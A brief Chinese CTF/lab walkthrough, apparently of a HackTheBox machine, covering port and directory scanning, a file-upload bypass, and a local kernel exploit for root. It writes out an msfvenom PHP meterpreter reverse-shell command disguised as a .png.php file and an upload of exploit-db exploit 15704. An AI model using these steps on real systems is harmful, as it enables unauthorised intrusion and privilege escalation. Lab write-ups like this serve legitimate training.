nmap一波出22和80
思路大概就是shell+提权
访问80是一个apache的初始页面
用kali自带的dirb进行目录扫描
dirb http://10.10.10.6
扫描到了一个网页
发现上传点在编辑torrent这个地方,JS前段绕过传一个shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f raw > a.png.php
然后设置handler
这里其实先设置handler然后设置payload也可以
接下来就是设置Lhost了
打过去之后获得shell
继续提权
这里使用msf的linux kernal exp
看到内核版本,那么在searchexploit 里面搜索,我选择了 15704
在msf里面上传
upload /usr/share/exploitdb/exploits/linux/local/15704.c
至于为什么要编译一次,应该是因为Linux的各种版本很多,直接传二进制可能运行起来有问题
接下来编译c代码,执行exp,获得root权限